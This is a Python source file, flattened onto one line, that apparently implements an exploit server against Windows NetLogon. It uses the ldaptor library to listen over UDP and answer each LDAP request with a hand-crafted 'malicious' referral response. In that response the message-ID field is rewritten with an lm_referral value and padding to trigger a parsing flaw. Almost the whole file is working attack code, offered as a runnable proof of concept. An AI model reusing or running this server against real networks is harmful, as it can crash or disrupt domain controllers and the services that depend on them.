import asyncio from logger import logger from ldaptor.protocols import pureldap from ldaptor.protocols import pureber REFERRAL_RESULT_CODE = 10 class LDAPSearchResultDoneRefferal(pureldap.LDAPSearchResultDone): def toWire(self): elements = [ pureber.BEREnumerated(self.resultCode), pureber.BEROctetString(self.matchedDN), pureber.BEROctetString(self.errorMessage), ] if self.resultCode == 10: # LDAP referral result code if self.referral: elements.append( pureber.BERSequence( [pureber.BEROctetString(url) for url in self.referral], tag=0xA3 # Context-specific tag for referral ) ) if self.serverSaslCreds: elements.append(pureldap.LDAPBindResponse_serverSaslCreds(self.serverSaslCreds)) return pureber.BERSequence(elements, tag=self.tag).toWire() def get_malicious_ldap_packet(message_id: int, lm_referral: int=2) -> bytes: """ Build a malicious LDAP response packet with a referral. The packet has the following structure: Result code: 10 (LDAP referral) Referral: ldap://referral.com (valid LDAP URL) Message ID: 4 bytes (big-endian) - the same as the original request with lm_referral value. """ if lm_referral == 0 or lm_referral > 255: raise ValueError("lm_referral must be between 1 and 255") if lm_referral & 1: raise ValueError("lm_referral must be an even number") ldap_search_result = LDAPSearchResultDoneRefferal(resultCode=REFERRAL_RESULT_CODE, referral=['ldap://referral.com']) ldap_response_message = pureldap.LDAPMessage(value=ldap_search_result, id=message_id) bytes_to_send = ldap_response_message.toWire() lm_referral_length_index = bytes_to_send.index(b"\x02\x01") + 1 message_id_byte = bytes_to_send[lm_referral_length_index + 1].to_bytes(length=1, byteorder='big') bytes_to_send = ( bytes_to_send[:lm_referral_length_index] # Everything before the message ID + b"\x04" # Type and Length of the message ID + lm_referral.to_bytes(length=1, byteorder='big') # encoded lm_referral + b"\x00\x00" # Padding + message_id_byte # Message ID + bytes_to_send[lm_referral_length_index + 2:] # Rest of the packet ) new_packet_length = bytes_to_send[1] + 3 bytes_to_send = bytes_to_send[0:1] + new_packet_length.to_bytes(length=1, byteorder='big') + bytes_to_send[2:] return bytes_to_send class LdapServerProtocol(asyncio.DatagramProtocol): def __init__(self): super().__init__() self.berdecoder = pureldap.LDAPBERDecoderContext_TopLevel( inherit=pureldap.LDAPBERDecoderContext_LDAPMessage( fallback=pureldap.LDAPBERDecoderContext( fallback=pureber.BERDecoderContext() ), inherit=pureldap.LDAPBERDecoderContext( fallback=pureber.BERDecoderContext() ), ) ) self.transport = None def connection_made(self, transport: asyncio.DatagramTransport) -> None: self.transport = transport logger.info(f"NetLogon connected") def datagram_received(self, data: bytes, addr) -> None: # Parse the received data ldap_message, _ = pureber.berDecodeObject(self.berdecoder, data) logger.info(f"Received LDAP request from NetLogon {addr}") # Build the "vulnerable" response packet vulnerable_ldap_packet = get_malicious_ldap_packet(ldap_message.id) logger.info(f"Sending malicious LDAP response packet to {addr}: {vulnerable_ldap_packet}") # Send back to client self.transport.sendto(vulnerable_ldap_packet, addr) def connection_refused(self, exc) -> None: logger.error(f"Connection refused: {exc}") def error_received(self, exc) -> None: logger.error(f"Error received: {exc}") async def run_exploit_server(listen_port: int): loop = asyncio.get_running_loop() transport, _ = await loop.create_datagram_endpoint( lambda: LdapServerProtocol(), local_addr=('0.0.0.0', listen_port) ) try: # Keep the server running forever (until Ctrl-C or you close the loop). await asyncio.Future() except KeyboardInterrupt: pass finally: transport.close() logger.info("Server has been shut down.")